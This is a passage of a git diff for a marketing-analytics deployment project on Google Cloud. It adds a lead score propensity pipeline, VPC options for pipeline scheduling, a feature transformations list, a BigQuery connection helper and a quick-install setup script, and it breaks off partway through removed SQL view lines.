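The feature engineering pipelines in this module share one dependency pattern: the label and feature stored procedures are collected in a `phase_1` list so they run in parallel, and the training/inference preparation steps fan in behind them with `.after(*phase_1)`. The new lead score propensity pipeline added below follows the same wiring; a stripped-down sketch with placeholder procedure calls (the `sp` component here is only a stand-in for the BigQuery stored-procedure component used by the real pipelines):

```python
from kfp import dsl

@dsl.component(base_image="python:3.10")
def sp(project: str, location: str, query: str, timeout: float):
    # Stand-in for the stored-procedure execution component.
    pass

@dsl.pipeline()
def feature_engineering_sketch(project_id: str, location: str, timeout: float = 3600.0):
    # Phase 1: label and feature procedures run concurrently.
    phase_1 = [
        sp(project=project_id, location=location, query="CALL label_proc()", timeout=timeout),
        sp(project=project_id, location=location, query="CALL user_dimensions_proc()", timeout=timeout),
        sp(project=project_id, location=location, query="CALL rolling_window_proc()", timeout=timeout),
    ]
    # Phase 2: preparation steps start only after every phase-1 task has finished.
    sp(project=project_id, location=location,
       query="CALL training_preparation_proc()", timeout=timeout).after(*phase_1)
    sp(project=project_id, location=location,
       query="CALL inference_preparation_proc()", timeout=timeout).after(*phase_1)
```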
+ +@dsl.pipeline() +def lead_score_propensity_feature_engineering_pipeline( + project_id: str, + location: Optional[str], + query_lead_score_propensity_label: str, + query_user_dimensions: str, + query_user_rolling_window_metrics: str, + query_lead_score_propensity_inference_preparation: str, + query_lead_score_propensity_training_preparation: str, + timeout: Optional[float] = 3600.0 +): + """ + This pipeline defines the steps for feature engineering for the lead score propensity model. + + Args: + project_id: The Google Cloud project ID. + location: The Google Cloud region where the pipeline will be run. + query_lead_score_propensity_label: The SQL query that will be used to calculate the purchase propensity label. + query_user_dimensions: The SQL query that will be used to calculate the user dimensions. + query_user_rolling_window_metrics: The SQL query that will be used to calculate the user rolling window metrics. + query_lead_score_propensity_inference_preparation: The SQL query that will be used to prepare the inference data. + query_lead_score_propensity_training_preparation: The SQL query that will be used to prepare the training data. + timeout: The timeout for the pipeline in seconds. + + Returns: + None + """ + + # Features Preparation + phase_1 = list() + phase_1.append( + sp( + project=project_id, + location=location, + query=query_lead_score_propensity_label, + timeout=timeout).set_display_name('lead_score_propensity_label') + ) + phase_1.append( + sp( + project=project_id, + location=location, + query=query_user_dimensions, + timeout=timeout).set_display_name('user_dimensions') + ) + phase_1.append( + sp( + project=project_id, + location=location, + query=query_user_rolling_window_metrics, + timeout=timeout).set_display_name('user_rolling_window_metrics') + ) + # Training data preparation + purchase_propensity_train_prep = sp( + project=project_id, + location=location, + query=query_lead_score_propensity_training_preparation, + timeout=timeout).set_display_name('lead_score_propensity_training_preparation').after(*phase_1) + # Inference data preparation + purchase_propensity_inf_prep = sp( + project=project_id, + location=location, + query=query_lead_score_propensity_inference_preparation, + timeout=timeout).set_display_name('lead_score_propensity_inference_preparation').after(*phase_1) + + @dsl.pipeline() def purchase_propensity_feature_engineering_pipeline( project_id: str, diff --git a/python/pipelines/pipeline_ops.py b/python/pipelines/pipeline_ops.py index a1b94675..abb15659 100644 --- a/python/pipelines/pipeline_ops.py +++ b/python/pipelines/pipeline_ops.py @@ -17,6 +17,7 @@ from tracemalloc import start import pip +from sympy import preview from kfp import compiler from google.cloud.aiplatform.pipeline_jobs import PipelineJob, _set_enable_caching_value from google.cloud.aiplatform import TabularDataset, Artifact @@ -625,6 +626,30 @@ def get_gcp_bearer_token() -> str: return bearer_token +def _get_project_number(project_id) -> str: + """ + Retrieves the project number from a project id + + Returns: + A string containing the project number + + Raises: + Exception: If an error occurs while retrieving the resource manager project object. 
+ """ + from google.cloud import resourcemanager_v3 + + # Create a resource manager client + client = resourcemanager_v3.ProjectsClient() + + # Get the project number + project = client.get_project(name=f"projects/{project_id}").name + project_number = project.split('/')[-1] + + logging.info(f"Project Number: {project_number}") + + return project_number + + # Function to schedule the pipeline. def schedule_pipeline( project_id: str, @@ -636,7 +661,9 @@ def schedule_pipeline( cron: str, max_concurrent_run_count: str, start_time: str, - end_time: str, + end_time: str = None, + subnetwork: str = "default", + use_private_service_access: bool = False, pipeline_parameters: Dict[str, Any] = None, pipeline_parameters_substitutions: Optional[Dict[str, Any]] = None, ) -> dict: @@ -654,6 +681,8 @@ def schedule_pipeline( max_concurrent_run_count: The maximum number of concurrent pipeline runs. start_time: The start time of the schedule. end_time: The end time of the schedule. + subnetwork: The VPC subnetwork name to be used in VPC peering. + use_private_service_access: A flag to define whether to use the VPC private service access or not. Returns: A dictionary containing information about the scheduled pipeline. @@ -676,19 +705,53 @@ def schedule_pipeline( pipeline_job = aiplatform.PipelineJob( template_path=template_path, pipeline_root=pipeline_root, + location=region, display_name=f"{pipeline_name}", ) - # Create the schedule with the pipeline job defined - pipeline_job_schedule = pipeline_job.create_schedule( + # https://cloud.google.com/python/docs/reference/aiplatform/latest/google.cloud.aiplatform.PipelineJobSchedule + # Create a schedule for the pipeline job + pipeline_job_schedule = aiplatform.PipelineJobSchedule( display_name=f"{pipeline_name}", - cron=cron, - max_concurrent_run_count=max_concurrent_run_count, - start_time=start_time, - end_time=end_time, - service_account=pipeline_sa, + pipeline_job=pipeline_job, + location=region ) + # Get the project number to use in the network identifier + project_number = _get_project_number(project_id) + + # Create the schedule using the pipeline job schedule + # Using the VPC private service access or not, depending on the flag + if use_private_service_access: + pipeline_job_schedule.create( + cron=cron, + max_concurrent_run_count=max_concurrent_run_count, + start_time=start_time, + end_time=end_time, + service_account=pipeline_sa, + network=f"projects/{project_number}/global/networks/{subnetwork}", + create_request_timeout=None, + ) + else: + pipeline_job_schedule.create( + cron=cron, + max_concurrent_run_count=max_concurrent_run_count, + start_time=start_time, + end_time=end_time, + service_account=pipeline_sa, + create_request_timeout=None, + ) + + # Old version - Create the schedule with the pipeline job defined + #pipeline_job_schedule = pipeline_job.create_schedule( + # display_name=f"{pipeline_name}", + # cron=cron, + # max_concurrent_run_count=max_concurrent_run_count, + # start_time=start_time, + # end_time=end_time, + # service_account=pipeline_sa, + #) + logging.info(f"Pipeline scheduled : {pipeline_name}") return pipeline_job @@ -903,4 +966,4 @@ def run_pipeline( if (pl.has_failed): raise RuntimeError("Pipeline execution failed") return pl - \ No newline at end of file + diff --git a/python/pipelines/scheduler.py b/python/pipelines/scheduler.py index fbdd9933..7e00dc8e 100644 --- a/python/pipelines/scheduler.py +++ b/python/pipelines/scheduler.py @@ -37,8 +37,11 @@ def check_extention(file_path: str, type: str = '.yaml'): 
'vertex_ai.pipelines.feature-creation-purchase-propensity.execution': "pipelines.feature_engineering_pipelines.purchase_propensity_feature_engineering_pipeline", 'vertex_ai.pipelines.feature-creation-churn-propensity.execution': "pipelines.feature_engineering_pipelines.churn_propensity_feature_engineering_pipeline", 'vertex_ai.pipelines.feature-creation-customer-ltv.execution': "pipelines.feature_engineering_pipelines.customer_lifetime_value_feature_engineering_pipeline", + 'vertex_ai.pipelines.feature-creation-lead-score-propensity.execution': "pipelines.feature_engineering_pipelines.lead_score_propensity_feature_engineering_pipeline", 'vertex_ai.pipelines.purchase_propensity.training': None, # tabular workflows pipelines is precompiled 'vertex_ai.pipelines.purchase_propensity.prediction': "pipelines.tabular_pipelines.prediction_binary_classification_pl", + 'vertex_ai.pipelines.lead_score_propensity.training': None, # tabular workflows pipelines is precompiled + 'vertex_ai.pipelines.lead_score_propensity.prediction': "pipelines.tabular_pipelines.prediction_binary_classification_pl", 'vertex_ai.pipelines.churn_propensity.training': None, # tabular workflows pipelines is precompiled 'vertex_ai.pipelines.churn_propensity.prediction': "pipelines.tabular_pipelines.prediction_binary_classification_pl", 'vertex_ai.pipelines.segmentation.training': "pipelines.segmentation_pipelines.training_pl", @@ -138,7 +141,9 @@ def check_extention(file_path: str, type: str = '.yaml'): cron=my_pipeline_vars['schedule']['cron'], max_concurrent_run_count=my_pipeline_vars['schedule']['max_concurrent_run_count'], start_time=my_pipeline_vars['schedule']['start_time'], - end_time=my_pipeline_vars['schedule']['end_time'] + end_time=my_pipeline_vars['schedule']['end_time'], + subnetwork=my_pipeline_vars['schedule']['subnetwork'], + use_private_service_access=my_pipeline_vars['schedule']['use_private_service_access'], ) if my_pipeline_vars['schedule']['state'] == 'PAUSED': diff --git a/python/pipelines/transformations-lead-score-propensity.json b/python/pipelines/transformations-lead-score-propensity.json new file mode 100644 index 00000000..28ca5e70 --- /dev/null +++ b/python/pipelines/transformations-lead-score-propensity.json @@ -0,0 +1,368 @@ +[ + { + "numeric": { + "column_name": "user_ltv_revenue", + "invalid_values_allowed": true + } + }, + { + "categorical": { + "column_name": "device_category" + } + }, + { + "categorical": { + "column_name": "device_mobile_brand_name" + } + }, + { + "categorical": { + "column_name": "device_mobile_model_name" + } + }, + { + "categorical": { + "column_name": "device_os" + } + }, + { + "categorical": { + "column_name": "device_language" + } + }, + { + "categorical": { + "column_name": "device_web_browser" + } + }, + { + "categorical": { + "column_name": "geo_sub_continent" + } + }, + { + "categorical": { + "column_name": "geo_country" + } + }, + { + "categorical": { + "column_name": "geo_region" + } + }, + { + "categorical": { + "column_name": "geo_city" + } + }, + { + "categorical": { + "column_name": "geo_metro" + } + }, + { + "categorical": { + "column_name": "last_traffic_source_medium" + } + }, + { + "categorical": { + "column_name": "last_traffic_source_name" + } + }, + { + "categorical": { + "column_name": "last_traffic_source_source" + } + }, + { + "categorical": { + "column_name": "first_traffic_source_medium" + } + }, + { + "categorical": { + "column_name": "first_traffic_source_name" + } + }, + { + "categorical": { + "column_name": "first_traffic_source_source" + } + 
}, + { + "categorical": { + "column_name": "has_signed_in_with_user_id" + } + }, + { + "numeric": { + "column_name": "scroll_50_past_1_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "scroll_50_past_2_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "scroll_50_past_3_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "scroll_50_past_4_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "scroll_50_past_5_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "scroll_90_past_1_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "scroll_90_past_2_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "scroll_90_past_3_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "scroll_90_past_4_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "scroll_90_past_5_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "view_search_results_past_1_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "view_search_results_past_2_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "view_search_results_past_3_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "view_search_results_past_4_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "view_search_results_past_5_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "file_download_past_1_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "file_download_past_2_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "file_download_past_3_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "file_download_past_4_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "file_download_past_5_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_add_to_list_past_1_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_add_to_list_past_2_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_add_to_list_past_3_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_add_to_list_past_4_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_add_to_list_past_5_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_print_past_1_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_print_past_2_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_print_past_3_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_print_past_4_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_print_past_5_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "sign_up_past_1_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "sign_up_past_2_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "sign_up_past_3_day", + 
"invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "sign_up_past_4_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "sign_up_past_5_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_favorite_past_1_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_favorite_past_2_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_favorite_past_3_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_favorite_past_4_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_favorite_past_5_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_add_to_menu_past_1_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_add_to_menu_past_2_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_add_to_menu_past_3_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_add_to_menu_past_4_day", + "invalid_values_allowed": true + } + }, + { + "numeric": { + "column_name": "recipe_add_to_menu_past_5_day", + "invalid_values_allowed": true + } + } +] \ No newline at end of file diff --git a/scripts/common.sh b/scripts/common.sh index 926eec7f..142fbbc1 100644 --- a/scripts/common.sh +++ b/scripts/common.sh @@ -46,8 +46,43 @@ declare -a apis_array=("cloudresourcemanager.googleapis.com" "bigquerymigration.googleapis.com" "bigquerydatatransfer.googleapis.com" "dataform.googleapis.com" + "cloudkms.googleapis.com" + "servicenetworking.googleapis.com" + "artifactregistry.googleapis.com" + "cloudbuild.googleapis.com" + "aiplatform.googleapis.com" + "storage-api.googleapis.com" + "bigqueryconnection.googleapis.com" ) +create_bigquery_connection() { + _PROJECT_ID=$1 + _LOCATION=$2 + _CONNECTION_TYPE='CLOUD_RESOURCE' + _CONNECTION_NAME=$3 + + CONNECTION_EXISTS=$(bq ls --connection --location=$_LOCATION --project_id=$_PROJECT_ID) + if [ "$CONNECTION_EXISTS" = "No connections found." ]; then + bq mk --connection --location=$_LOCATION --project_id=$_PROJECT_ID --connection_type=$_CONNECTION_TYPE $_CONNECTION_NAME + + SERVICE_ACCT_EMAIL=$(bq show --format=prettyjson --connection $_LOCATION.$_CONNECTION_NAME | grep "serviceAccountId" | cut -d '"' -f 4 | cut -d '?' 
-f 1) + echo $SERVICE_ACCT_EMAIL + + gcloud projects add-iam-policy-binding $PROJECT_ID --condition=None --no-user-output-enabled --member="serviceAccount:$SERVICE_ACCT_EMAIL" --role="roles/serviceusage.serviceUsageConsumer" + gcloud projects add-iam-policy-binding $PROJECT_ID --condition=None --no-user-output-enabled --member="serviceAccount:$SERVICE_ACCT_EMAIL" --role="roles/bigquery.connectionUser" + gcloud projects add-iam-policy-binding $PROJECT_ID --condition=None --no-user-output-enabled --member="serviceAccount:$SERVICE_ACCT_EMAIL" --role="roles/bigquery.connectionAdmin" + gcloud projects add-iam-policy-binding $PROJECT_ID --condition=None --no-user-output-enabled --member="serviceAccount:$SERVICE_ACCT_EMAIL" --role="roles/aiplatform.user" + gcloud projects add-iam-policy-binding $PROJECT_ID --condition=None --no-user-output-enabled --member="serviceAccount:$SERVICE_ACCT_EMAIL" --role="roles/bigquery.jobUser" + gcloud projects add-iam-policy-binding $PROJECT_ID --condition=None --no-user-output-enabled --member="serviceAccount:$SERVICE_ACCT_EMAIL" --role="roles/bigquery.dataEditor" + gcloud projects add-iam-policy-binding $PROJECT_ID --condition=None --no-user-output-enabled --member="serviceAccount:$SERVICE_ACCT_EMAIL" --role="roles/storage.admin" + gcloud projects add-iam-policy-binding $PROJECT_ID --condition=None --no-user-output-enabled --member="serviceAccount:$SERVICE_ACCT_EMAIL" --role="roles/storage.objectViewer" + return 0 + else + echo "BQ Connection already exists: $CONNECTION_EXISTS" + return 0 + fi +} + get_project_id() { local __resultvar=$1 VALUE=$(gcloud config get-value project | xargs) diff --git a/scripts/generate-tf-backend.sh b/scripts/generate-tf-backend.sh index 5a1178fc..481a0885 100755 --- a/scripts/generate-tf-backend.sh +++ b/scripts/generate-tf-backend.sh @@ -19,15 +19,15 @@ set -o nounset . scripts/common.sh -section_open "Check if the necessary dependencies are available: gcloud, gsutil, terraform, poetry" +section_open "Check if the necessary dependencies are available: gcloud, gsutil, terraform, uv" check_exec_dependency "gcloud" check_exec_version "gcloud" check_exec_dependency "gsutil" check_exec_version "gsutil" check_exec_dependency "terraform" check_exec_version "terraform" - check_exec_dependency "poetry" - check_exec_version "poetry" + check_exec_dependency "uv" + check_exec_version "uv" section_close section_open "Check if the necessary variables are set: PROJECT_ID" @@ -51,10 +51,6 @@ section_open "Enable all the required APIs" enable_all_apis section_close -section_open "Install poetry libraries in the virtual environment for Terraform" - poetry install -section_close - section_open "Creating a new Google Cloud Storage bucket to store the Terraform state in ${TF_STATE_PROJECT} project, bucket: ${TF_STATE_BUCKET}" if gsutil ls -b gs://"${TF_STATE_BUCKET}" >/dev/null 2>&1; then printf "The ${TF_STATE_BUCKET} Google Cloud Storage bucket already exists. \n" @@ -69,6 +65,11 @@ section_open "Creating terraform backend.tf configuration file" create_terraform_backend_config_file "${TERRAFORM_RUN_DIR}" "${TF_STATE_BUCKET}" section_close +section_open "Creating BigQuery and Vertex AI connection" + create_bigquery_connection "${PROJECT_ID}" "${LOCATION}" "vertex_ai_conn" + create_bigquery_connection "${PROJECT_ID}" "US" "vertex_ai_conn" +section_close + printf "$DIVIDER" printf "You got the end the of your generate-tf-backend script with everything working. 
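The new `create_bigquery_connection` helper above shells out to `bq mk --connection` and then grants IAM roles to the connection's generated service account. For reference, a minimal Python sketch of the same connection-creation step using the `google-cloud-bigquery-connection` client that this change adds to `pyproject.toml` (project, location and connection id are placeholders; the IAM bindings are left to `gcloud`, as in the script):

```python
from google.cloud import bigquery_connection_v1 as bq_connection

def create_cloud_resource_connection(project_id: str, location: str, connection_id: str) -> str:
    """Create a CLOUD_RESOURCE connection and return its service account email."""
    client = bq_connection.ConnectionServiceClient()
    parent = client.common_location_path(project_id, location)
    connection = bq_connection.Connection(
        cloud_resource=bq_connection.CloudResourceProperties()
    )
    response = client.create_connection(
        request=bq_connection.CreateConnectionRequest(
            parent=parent,
            connection_id=connection_id,
            connection=connection,
        )
    )
    # This is the service account the script binds the BigQuery/Vertex AI roles to.
    return response.cloud_resource.service_account_id

# Example: create_cloud_resource_connection("my-project", "us-central1", "vertex_ai_conn")
```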
\n" printf "$DIVIDER" diff --git a/scripts/quick-install.sh b/scripts/quick-install.sh new file mode 100755 index 00000000..57d0ed2c --- /dev/null +++ b/scripts/quick-install.sh @@ -0,0 +1,137 @@ +#!/usr/bin/env sh + +# Copyright 2023 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +set -o errexit +set -o nounset +#set -x + +. scripts/common.sh + +section_open "Setting the gcloud project id" + # Ask user to input the project id + echo "Input the GCP Project Id where you want to deploy Marketing Analytics Jumpstart:" + read TF_STATE_PROJECT_ID + # Set the project id to the environment variable + export TF_STATE_PROJECT_ID + # Set the project id to the environment variable + export GOOGLE_CLOUD_PROJECT=${TF_STATE_PROJECT_ID} + # Set the project id to the environment variable + export GOOGLE_CLOUD_QUOTA_PROJECT=$GOOGLE_CLOUD_PROJECT + # Set the project id to the environment variable + export PROJECT_ID=$GOOGLE_CLOUD_PROJECT + # Disable prompts + gcloud config set disable_prompts true + # Set the project id to the gcloud configuration + gcloud config set project "${TF_STATE_PROJECT_ID}" +section_close + +section_open "Enable all the required APIs" + enable_all_apis +section_close + +section_open "Authenticate to Google Cloud Project" + gcloud auth login --project "${TF_STATE_PROJECT_ID}" + echo "Close the browser tab that was open and press any key to continue.." + read moveon +section_close + +section_open "Setting Google Application Default Credentials" + gcloud config set disable_prompts false + gcloud auth application-default login --quiet --scopes="openid,https://www.googleapis.com/auth/userinfo.email,https://www.googleapis.com/auth/cloud-platform,https://www.googleapis.com/auth/sqlservice.login,https://www.googleapis.com/auth/analytics,https://www.googleapis.com/auth/analytics.edit,https://www.googleapis.com/auth/analytics.provision,https://www.googleapis.com/auth/analytics.readonly,https://www.googleapis.com/auth/accounts.reauth" + echo "Close the browser tab that was open and press any key to continue.." 
+    read moveon
+    CREDENTIAL_FILE=`gcloud auth application-default set-quota-project "${PROJECT_ID}" 2>&1 | grep -e "Credentials saved to file:" | cut -d "[" -f2 | cut -d "]" -f1`
+    export GOOGLE_APPLICATION_CREDENTIALS=${CREDENTIAL_FILE}
+section_close
+
+section_open "Check OS system"
+    unameOut="$(uname -s)"
+    case "${unameOut}" in
+        Linux*)     machine=Linux;;
+        Darwin*)    machine=Mac;;
+        CYGWIN*)    machine=Cygwin;;
+        MINGW*)     machine=MinGw;;
+        MSYS_NT*)   machine=Git;;
+        *)          machine="UNKNOWN:${unameOut}"
+    esac
+    echo ${machine}
+section_close
+
+section_open "Configuring environment"
+    SOURCE_ROOT=$(pwd)
+    cd ${SOURCE_ROOT}
+
+    # Install python3.10; take ownership of /usr/local/sbin for the current user rather than a hardcoded account
+    sudo chown -R "$(whoami)" /usr/local/sbin
+    chmod u+w /usr/local/sbin
+    if [ "$machine" = "Linux" ]; then
+        sudo DEBIAN_FRONTEND=noninteractive apt-get -qq -o=Dpkg::Use-Pty=0 install python3.10 --assume-yes
+    elif [ "$machine" = "Mac" ]; then
+        brew install python@3.10
+    fi
+    export CLOUDSDK_PYTHON=python3.10
+
+    # Install pipx
+    if [ "$machine" = "Linux" ]; then
+        sudo apt update
+        sudo apt install pipx
+    elif [ "$machine" = "Mac" ]; then
+        brew install pipx
+    fi
+    pipx ensurepath
+
+    #pip3 install poetry
+    pipx install poetry
+    export PATH="$HOME/.local/bin:$PATH"
+    poetry env use python3.10
+    poetry --version
+
+    # Install tfenv
+    if [ ! -d ~/.tfenv ]; then
+        git clone --depth=1 https://github.com/tfutils/tfenv.git ~/.tfenv
+        echo 'export PATH="$HOME/.tfenv/bin:$PATH"' >> ~/.bash_profile
+        echo 'export PATH=$PATH:$HOME/.tfenv/bin' >> ~/.bashrc
+    fi
+    export PATH="$PATH:$HOME/.tfenv/bin"
+
+    # Install terraform version
+    tfenv install 1.5.7
+    tfenv use 1.5.7
+    terraform --version
+
+    # Generate TF backend
+    . scripts/generate-tf-backend.sh
+section_close
+
+section_open "Preparing Terraform Environment File"
+    TERRAFORM_RUN_DIR=${SOURCE_ROOT}/infrastructure/terraform
+    if [ ! -f $TERRAFORM_RUN_DIR/terraform.tfvars ]; then
+        . 
scripts/set-env.sh + sudo apt-get -qq -o=Dpkg::Use-Pty=0 install gettext + envsubst < "${SOURCE_ROOT}/infrastructure/cloudshell/terraform-template.tfvars" > "${TERRAFORM_RUN_DIR}/terraform.tfvars" + fi +section_close + +section_open "Deploying Terraform Infrastructure Resources" + export PATH="$HOME/.local/bin:$PATH" + export PATH="$PATH:$HOME/.tfenv/bin" + terraform -chdir="${TERRAFORM_RUN_DIR}" init + terraform -chdir="${TERRAFORM_RUN_DIR}" apply +section_close + +#set +x +set +o nounset +set +o errexit diff --git a/sql/procedure/churn_propensity_training_preparation.sqlx b/sql/procedure/churn_propensity_training_preparation.sqlx index 32056b62..36a8f657 100644 --- a/sql/procedure/churn_propensity_training_preparation.sqlx +++ b/sql/procedure/churn_propensity_training_preparation.sqlx @@ -849,189 +849,6 @@ WHERE MOD(row_order_peruser_persplit-1, 30) = 0; - CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_churn_propensity_training_30_30_balanced` -(processed_timestamp, - data_split, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - active_users_past_15_30_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - purchases_past_15_30_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - visits_past_15_30_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - view_items_past_15_30_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - add_to_carts_past_15_30_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - checkouts_past_15_30_day, - churned) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL 48 HOUR), - friendly_name="v_churn_propensity_training_30_30_balanced", - description="View Churn Propensity Training dataset using 30 days back to predict 15 days ahead. View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS - SELECT DISTINCT - processed_timestamp, -- The timestamp the row was processed. - data_split, -- The data split (train, validation, test) for the user. - user_pseudo_id, -- The unique identifier for the user. - user_id, -- The user ID. - user_ltv_revenue, -- The lifetime value revenue for the user. 
- device_category, -- The category of the device used by the user. - device_mobile_brand_name, -- The brand name of the mobile device used by the user. - device_mobile_model_name, -- The model name of the mobile device used by the user. - device_os, -- The operating system of the device used by the user. - device_language, -- The language used by the user. - device_web_browser, -- The web browser used by the user. - geo_sub_continent, -- The sub-continent of the user's location. - geo_country, -- The country of the user's location. - geo_region, -- The region of the user's location. - geo_city, -- The city of the user's location. - geo_metro, -- The metropolitan area of the user's location. - last_traffic_source_medium, -- The medium used to reach the user's last session. - last_traffic_source_name, -- The name of the traffic source used to reach the user's last session. - last_traffic_source_source, -- The source of the last traffic source used by the user. - first_traffic_source_medium, -- The medium of the first traffic source used by the user. - first_traffic_source_name, -- The name of the first traffic source used by the user. - first_traffic_source_source, -- The source of the first traffic source used by the user. - has_signed_in_with_user_id, -- Whether the user has signed in with a user ID. - active_users_past_1_day, -- The number of active users in the past 1 day for each user. - active_users_past_2_day, -- The number of active users in the past 2 days for each user. - active_users_past_3_day, -- The number of active users in the past 3 days for each user. - active_users_past_4_day, -- The number of active users in the past 4 days for each user. - active_users_past_5_day, -- The number of active users in the past 5 days for each user. - active_users_past_6_day, -- The number of active users in the past 6 days for each user. - active_users_past_7_day, -- The number of active users in the past 7 days for each user. - active_users_past_8_14_day, -- The number of active users in the past 8-14 days for each user. - active_users_past_15_30_day, -- The number of active users in the past 15-30 days for each user. - purchases_past_1_day, -- The number of purchases in the past 1 day for each user. - purchases_past_2_day, -- The number of purchases in the past 2 days for each user. - purchases_past_3_day, -- The number of purchases in the past 3 days for each user. - purchases_past_4_day, -- The number of purchases in the past 4 days for each user. - purchases_past_5_day, -- The number of purchases in the past 5 days for each user. - purchases_past_6_day, -- The number of purchases in the past 6 days for each user. - purchases_past_7_day, -- The number of purchases in the past 7 days for each user. - purchases_past_8_14_day, -- The number of purchases in the past 8-14 days for each user. - purchases_past_15_30_day, -- The number of purchases in the past 15-30 days for each user. - visits_past_1_day, -- The number of visits in the past 1 day for each user. - visits_past_2_day, -- The number of visits in the past 2 days for each user. - visits_past_3_day, -- The number of visits in the past 3 days for each user. - visits_past_4_day, -- The number of visits in the past 4 days for each user. - visits_past_5_day, -- The number of visits in the past 5 days for each user. - visits_past_6_day, -- The number of visits in the past 6 days for each user. - visits_past_7_day, -- The number of visits in the past 7 days for each user. 
- visits_past_8_14_day, -- The number of visits in the past 8-14 days for each user. - visits_past_15_30_day, -- The number of visits in the past 15-30 days for each user. - view_items_past_1_day, -- The number of items viewed in the past 1 day for each user. - view_items_past_2_day, -- The number of items viewed in the past 2 days for each user. - view_items_past_3_day, -- The number of items viewed in the past 3 days for each user. - view_items_past_4_day, -- The number of items viewed in the past 4 days for each user. - view_items_past_5_day, -- The number of items viewed in the past 5 days for each user. - view_items_past_6_day, -- The number of items viewed in the past 6 days for each user. - view_items_past_7_day, -- The number of items viewed in the past 7 days for each user. - view_items_past_8_14_day, -- The number of items viewed in the past 8-14 days for each user. - view_items_past_15_30_day, -- The number of items viewed in the past 15-30 days for each user. - add_to_carts_past_1_day, -- The number of items added to carts in the past 1 day for each user. - add_to_carts_past_2_day, -- The number of items added to carts in the past 2 days for each user. - add_to_carts_past_3_day, -- The number of items added to carts in the past 3 days for each user. 